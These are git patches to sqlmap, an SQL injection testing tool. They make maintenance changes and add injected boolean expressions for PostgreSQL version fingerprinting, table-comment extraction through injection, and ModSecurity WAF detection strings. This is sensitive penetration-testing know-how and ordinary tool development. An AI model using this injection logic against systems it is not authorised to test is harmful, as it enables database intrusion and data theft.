a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py index a728a74da9b..8d15b478fbf 100644 --- a/plugins/dbms/mssqlserver/takeover.py +++ b/plugins/dbms/mssqlserver/takeover.py @@ -26,8 +26,8 @@ def uncPathRequest(self): def spHeapOverflow(self): """ References: - * http://www.microsoft.com/technet/security/bulletin/MS09-004.mspx - * http://support.microsoft.com/kb/959420 + * https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-004 + * https://support.microsoft.com/en-us/help/959420/ms09-004-vulnerabilities-in-microsoft-sql-server-could-allow-remote-co """ returns = { diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index fc8946ada07..4f31e73089b 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -24,10 +24,10 @@ class Connector(GenericConnector): """ - Homepage: http://cx-oracle.sourceforge.net/ - User guide: http://cx-oracle.sourceforge.net/README.txt - API: http://cx-oracle.sourceforge.net/html/index.html - License: http://cx-oracle.sourceforge.net/LICENSE.txt + Homepage: https://oracle.github.io/python-cx_Oracle/ + User https://cx-oracle.readthedocs.io/en/latest/ + API: https://wiki.python.org/moin/DatabaseProgramming + License: https://cx-oracle.readthedocs.io/en/latest/license.html#license """ def __init__(self): diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 61c0d6efd1b..a9a50633f94 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -60,7 +60,7 @@ def checkDbms(self): """ References for fingerprint: - * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3) + * https://www.postgresql.org/docs/current/static/release.html """ if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES): @@ -97,8 +97,12 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.PGSQL logger.info(infoMsg) - if inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): - Backend.setVersion(">= 9.5.0") + if inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"): + Backend.setVersion(">= 10.0") + elif inject.checkBooleanExpression("SIND(0)=0"): + Backend.setVersion(">= 9.6.0", "< 10.0") + elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): + Backend.setVersion(">= 9.5.0", "< 9.6.0") elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c6b2556675a..94e15d08bec 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f49b5204228e41b1cfab5ba231272f09 lib/core/settings.py +0134616235193faba40a094cf7a4ba09 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -77,7 +77,7 @@ eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py b188a11542a996276abbbc48913501c3 lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py -aa7cb67139bbc57d67a728fd2abf80ed lib/request/rangehandler.py +2c3774b72586985719035b195f144d7b lib/request/rangehandler.py aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py 747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py @@ -124,7 +124,7 @@ c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py -ead470b613e52e718a3062b63b518272 plugins/dbms/db2/connector.py +8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py 4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py @@ -145,7 +145,7 @@ b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py -9ceb9430031a26ecebe13ea49cb2a5fa plugins/dbms/informix/connector.py +97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py 35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py @@ -160,13 +160,13 @@ ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py 4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py -9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/mssqlserver/connector.py +decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py 177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py -51eb413ac62408965be20a812f2412c8 plugins/dbms/mssqlserver/fingerprint.py +08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py -08fe8ac7acdfc0e3168b5b069a7c73bf plugins/dbms/mssqlserver/takeover.py +3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py @@ -174,7 +174,7 @@ fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py -999cb8d0d52820d30bdd4b3d658a765d plugins/dbms/oracle/connector.py +f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py e16cbf8abda91a906ca7bafb81d8866e plugins/dbms/oracle/fingerprint.py @@ -184,7 +184,7 @@ bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py 7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -603d533d924498378eccba4f0f196be6 plugins/dbms/postgresql/fingerprint.py +29560cf78211888802c6e5c8681e7d71 plugins/dbms/postgresql/fingerprint.py 470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py 20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py 1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py From 7b3a17bfe73a80ba05f2086ff1ab025d5c5e6403 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 9 May 2018 13:38:39 +0200 Subject: [PATCH 134/428] Patch for #3068 --- lib/core/common.py | 4 ++++ lib/core/settings.py | 2 +- lib/utils/sqlalchemy.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 9 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 86d6c17c194..dd504674269 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1387,6 +1387,10 @@ def parseTargetDirect(): __import__("psycopg2") elif dbmsName == DBMS.ORACLE: __import__("cx_Oracle") + + # Reference: http://itsiti.com/ora-28009-connection-sys-sysdba-sysoper + if (conf.dbmsUser or "").upper() == "SYS": + conf.direct = "%s?mode=SYSDBA" % conf.direct elif dbmsName == DBMS.SQLITE: __import__("sqlite3") elif dbmsName == DBMS.ACCESS: diff --git a/lib/core/settings.py b/lib/core/settings.py index 362c85b1ccf..7f8161fcee0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.9" +VERSION = "1.2.5.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 7dfc593096b..4315cf7d033 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -57,7 +57,7 @@ def connect(self): if self.dialect == "sqlite": engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False}) elif self.dialect == "oracle": - engine = _sqlalchemy.create_engine(conf.direct, connect_args={"allow_twophase": False}) + engine = _sqlalchemy.create_engine(conf.direct) else: engine = _sqlalchemy.create_engine(conf.direct, connect_args={}) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 94e15d08bec..681a53cdf6d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py b1990c7805943f0c973a853bba981d96 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -2e81c8be79eb98227affcfd7bd25c702 lib/core/common.py +3418e7b81884c1908dca632c590495ab lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0134616235193faba40a094cf7a4ba09 lib/core/settings.py +28c2fa86e020a801bf0a92974113b0ef lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -113,7 +113,7 @@ cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py 5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py -236a8d9e596602b53f8e0aa09c30c0ef lib/utils/sqlalchemy.py +571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py 3d230e342a6c8d60ac7c68c556fbba9b lib/utils/versioncheck.py 7348ee704485651737ddbe3538271be9 lib/utils/xrange.py From d5627fdf1b00443d849587f2c23554c2c353544f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 15 May 2018 12:15:47 +0200 Subject: [PATCH 135/428] Fixes #3099 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/queries.xml | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7f8161fcee0..08da8e3342e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.10" +VERSION = "1.2.5.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 681a53cdf6d..fe51dbdc131 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -28c2fa86e020a801bf0a92974113b0ef lib/core/settings.py +5685eacb5dd1a67c8e30b85b7ead70a9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -471,4 +471,4 @@ b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -186808373a45316a45ad5f6ca8d90ff3 xml/queries.xml +a5eecbca03800851635817e0ca832a92 xml/queries.xml diff --git a/xml/queries.xml b/xml/queries.xml index cbd407d47da..642182b7a62 100644 --- a/xml/queries.xml +++ b/xml/queries.xml @@ -711,7 +711,7 @@ - + From 331ccc5549e6d1c47797a7ec30fa009b80178e7c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 May 2018 23:07:52 +0200 Subject: [PATCH 136/428] Fixes #3100 --- lib/core/settings.py | 2 +- lib/request/inject.py | 3 +++ lib/techniques/blind/inference.py | 5 ++++- txt/checksum.md5 | 6 +++--- 4 files changed, 11 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 08da8e3342e..57015d407fc 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.11" +VERSION = "1.2.5.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/inject.py b/lib/request/inject.py index cfe69a6ba50..89cfbd0d455 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -77,6 +77,9 @@ def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar value = _goDns(payload, expression) + if payload is None: + return None + if value is not None: return value diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 2783231f503..e08c5b6c627 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -69,6 +69,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None finalValue = None retrievedLength = 0 + if payload is None: + return 0, None + if charsetType is None and conf.charset: asciiTbl = sorted(set(ord(_) for _ in conf.charset)) else: @@ -187,7 +190,7 @@ def tryHint(idx): with hintlock: hintValue = kb.hintValue - if hintValue is not None and len(hintValue) >= idx: + if payload is not None and hintValue is not None and len(hintValue) >= idx: if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.MAXDB, DBMS.DB2): posValue = hintValue[idx - 1] else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fe51dbdc131..b77d3e04ade 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -5685eacb5dd1a67c8e30b85b7ead70a9 lib/core/settings.py +28b7ef08849aa6d4f652a9d1c58ca8f2 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -74,7 +74,7 @@ dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py -b188a11542a996276abbbc48913501c3 lib/request/inject.py +c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py 51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py @@ -88,7 +88,7 @@ fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py 2665fa7eedb19a1b10ffe949999b75f1 lib/takeover/web.py f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py -2543e14cc7f6e239b49dd40f41bc34fa lib/techniques/blind/inference.py +4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py 799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py From 42b0edca6dcfaf852d6d303e3411c47efa4ba885 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 19 May 2018 12:35:39 +0200 Subject: [PATCH 137/428] Fixes #3109 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/modsecurity.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 57015d407fc..cecc8f3013b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.12" +VERSION = "1.2.5.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index b77d3e04ade..c97b8d47890 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -28b7ef08849aa6d4f652a9d1c58ca8f2 lib/core/settings.py +d9c4c537aef395bbcf182a7f57bb510f lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -417,7 +417,7 @@ eb56ac34775cc3c5f721ec967d04b283 waf/generic.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py 898f53c12133da3e946301f4aa97d538 waf/knownsec.py 81e6bf619c7bb73c4b62e2439e60e95a waf/kona.py -4906ab7bea7f6715f5796933f1a89381 waf/modsecurity.py +b17a154fe7959619eaafffa60e14199f waf/modsecurity.py d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py cb2f1516867684042f580e02138463de waf/netscaler.py diff --git a/waf/modsecurity.py b/waf/modsecurity.py index d6d0ecbef81..6b13043ef10 100644 --- a/waf/modsecurity.py +++ b/waf/modsecurity.py @@ -18,7 +18,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) retval = re.search(r"Mod_Security|NOYB", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None - retval |= "This error was generated by Mod_Security" in (page or "") + retval |= any(_ in (page or "") for _ in ("This error was generated by Mod_Security", "One or more things in your request were suspicious", "rules of the mod_security module")) if retval: break From d8196cf7e650b0553a82644a4de5af82621c6535 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 May 2018 23:17:32 +0200 Subject: [PATCH 138/428] Fixes #3110 --- lib/core/settings.py | 2 +- lib/request/connect.py | 7 ------- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 10 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index cecc8f3013b..59a63252195 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.13" +VERSION = "1.2.5.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 2d6e5dfd07b..6bdb5b69e46 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -644,13 +644,6 @@ class _(dict): elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg: warnMsg = "connection was forcibly closed by the target URL" elif "timed out" in tbMsg: - if not conf.disablePrecon: - singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)") - conf.disablePrecon = True - - if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): - kb.responseTimes.clear() - if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests") kb.droppingRequests = True diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c97b8d47890..d1ecb54271a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d9c4c537aef395bbcf182a7f57bb510f lib/core/settings.py +7b3e526a8b77e167e0572e1ec52e2d62 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -69,7 +69,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 596988f14408cde1a2d3b5c9f231873a lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -e9bbba4a133effeae86d146286f9116b lib/request/connect.py +0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py From 43d9ac2bd47304c05b520d4163b805b211774e16 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 May 2018 23:44:21 +0200 Subject: [PATCH 139/428] Patch related to the #3101 --- lib/core/settings.py | 2 +- plugins/generic/databases.py | 36 ++++++++++++++++++++++++++++++++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 39 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 59a63252195..24ef311de60 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.5.14" +VERSION = "1.2.5.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index b17ff722a63..6e9ec1e638e 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -290,6 +290,24 @@ def getTables(self, bruteForce=None): db = safeSQLIdentificatorNaming(db) table = safeSQLIdentificatorNaming(unArrayizeValue(table), True) + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].table_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table)) + + comment = unArrayizeValue(inject.getValue(query, blind=False, time=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for table '%s' " % (comment, unsafeSQLIdentificatorNaming(table)) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get column comments" + singleTimeWarnMessage(warnMsg) + if db not in kb.data.cachedTables: kb.data.cachedTables[db] = [table] else: @@ -353,6 +371,24 @@ def getTables(self, bruteForce=None): table = safeSQLIdentificatorNaming(table, True) tables.append(table) + if conf.getComments: + _ = queries[Backend.getIdentifiedDbms()].table_comment + if hasattr(_, "query"): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + query = _.query % (unsafeSQLIdentificatorNaming(db.upper()), unsafeSQLIdentificatorNaming(table.upper())) + else: + query = _.query % (unsafeSQLIdentificatorNaming(db), unsafeSQLIdentificatorNaming(table)) + + comment = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if not isNoneValue(comment): + infoMsg = "retrieved comment '%s' for table '%s' " % (comment, unsafeSQLIdentificatorNaming(table)) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.info(infoMsg) + else: + warnMsg = "on %s it is not " % Backend.getIdentifiedDbms() + warnMsg += "possible to get column comments" + singleTimeWarnMessage(warnMsg) + if tables: kb.data.cachedTables[db] = tables else: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d1ecb54271a..8d1d6f4214f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7b3e526a8b77e167e0572e1ec52e2d62 lib/core/settings.py +61a242f506d7e3374230b2e904ea309b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -204,7 +204,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -79c6dbcb7e6ad5e993a44aa52fdc36ed plugins/generic/databases.py +156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py From d2d829abf5b2033c8db94a69cc1e8d3046de8826 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 May 2018 10:07:35 +0200 Subject: [PATCH 140/428] Patch related to the #3117 --- lib/core/settings.py | 2 +- lib/utils/versioncheck.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 